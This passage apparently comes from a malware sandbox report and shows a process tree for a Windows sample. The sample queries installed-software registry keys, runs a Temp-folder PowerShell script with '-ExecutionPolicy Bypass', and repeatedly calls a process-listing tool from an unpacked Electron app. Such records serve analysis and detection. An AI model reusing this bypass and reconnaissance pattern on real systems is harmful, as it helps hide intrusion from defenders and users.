- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
    3⤵
    PID:5012
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
      4⤵
      PID:2612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""
    3⤵
    PID:2032
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"
      4⤵
      PID:3884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""
    3⤵
    PID:7032
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"
      4⤵
      PID:6108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""
    3⤵
    PID:2788
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"
      4⤵
      PID:696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
    3⤵
    PID:4540
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
      4⤵
      PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""
    3⤵
    PID:5292
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"
      4⤵
      PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
    3⤵
    PID:5132
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
      4⤵
      PID:7028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""
    3⤵
    PID:1580
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"
      4⤵
      PID:5868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""
    3⤵
    PID:6804
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"
      4⤵
      PID:6336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\i0d7S1yluzXI_tezmp.ps1""
    3⤵
    PID:7288
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\i0d7S1yluzXI_tezmp.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2020
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3624
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7236
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5248
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7428
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5940
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7304
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2384
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6044
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5992
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7132
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7292
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7496
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6028
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6832
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5332
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7580
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7124
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7660
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5540
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6176
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7976
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6912
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:740
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5360
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7756
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5304
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7968
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5472
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3152
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2088
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5520
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6808
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8160
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6020
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5296
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6860
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7980
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6164
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7804
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5892
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8092
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6496
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8168
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2636
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5392
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5512
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7264
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5444
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3760
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6372
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4608
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5588
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6800
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6596
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6512
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7604
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7788
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7392
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6444
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7276
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:1688
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7940
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7332
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7128
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:1276
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8140
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7708
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7296
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7624
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6680
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6760
